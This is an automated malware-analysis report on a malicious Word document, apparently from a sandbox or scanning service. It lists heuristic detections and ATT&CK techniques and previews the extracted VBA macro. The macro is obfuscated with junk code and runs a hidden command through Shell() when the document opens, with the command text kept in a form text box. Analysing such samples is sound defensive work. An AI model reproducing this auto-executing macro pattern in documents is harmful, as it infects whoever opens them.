MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the 'autoopen' event and uses the Shell() function to execute arbitrary commands. The presence of the 'autoopen' macro and the Shell() call strongly indicate malicious intent, likely to download and execute a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Malware.Generic-6796551-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Generic-6796551-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4544 bytes |
SHA-256: e98f33bdcef57199e9cd8a14c19844cbce61e0e2ebabb44344e2698a5731151d
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "i87670701432"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
q0087 = 90 - 239
S368 = 901 - 275
z006 = 379 - 263
z8060146
F8918 = 492 - 126
O771 = 500 - 545
w3478 = 111 - 103
End Sub
Attribute VB_Name = "U1730818151"
Function z8060146()
On Error Resume Next
Select Case r7741
Case 537
v9843 = k500
v478 = a2342
I0806 = Fix(486)
Case 814
c7597 = I4391
f1478 = 294
s229 = Oct(T389)
End Select
Select Case O7361
Case 505
h8183 = k644
O467 = u900
n525 = Fix(277)
Case 648
h139 = E4671
K6897 = 184
d363 = Oct(i267)
End Select
Select Case A599
Case 270
H5675 = r8911
w653 = w954
z393 = Fix(21)
Case 232
o007 = o5296
W3644 = 697
d881 = Oct(z9625)
End Select
I67322242 = Array(C27401257, H956881093, A01549053, Interaction.Shell(("" + S976551 + j947412 + C250113 + d32047857 + i87670701432.TextBox1) + R70180 + U1385231, 22 - 22), W874955648, i9953515, X229720)
Select Case w8929
Case 561
a1743 = E543
Z271 = X9470
E7529 = Fix(362)
Case 863
X508 = m4987
r117 = 473
s094 = Oct(b996)
End Select
Select Case N4296
Case 203
q439 = O2347
z5687 = B9809
E452 = Fix(369)
Case 787
h8770 = t0053
X2881 = 206
l2985 = Oct(A335)
End Select
Select Case z562
Case 754
X702 = Q1198
M1145 = H173
O086 = Fix(858)
Case 148
w213 = t049
X4949 = 481
q9963 = Oct(C294)
End Select
Select Case b164
Case 189
d739 = q1608
u7824 = n463
a7063 = Fix(189)
Case 9
l156 = f2490
J671 = 933
J4299 = Oct(f372)
End Select
End Function
Attribute VB_Name = "A3861806484572"
Attribute VB_Name = "I01009050929"
Attribute VB_Name = "S84084430380017"
Attribute VB_Name = "G9386019233637"
Attribute VB_Name = "X4627443918"
Attribute VB_Name = "t9961119"
Attribute VB_Name = "Q162177775681"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "n6196399"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Y026074798"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H3241664284046"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K563496862"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Att
... (truncated)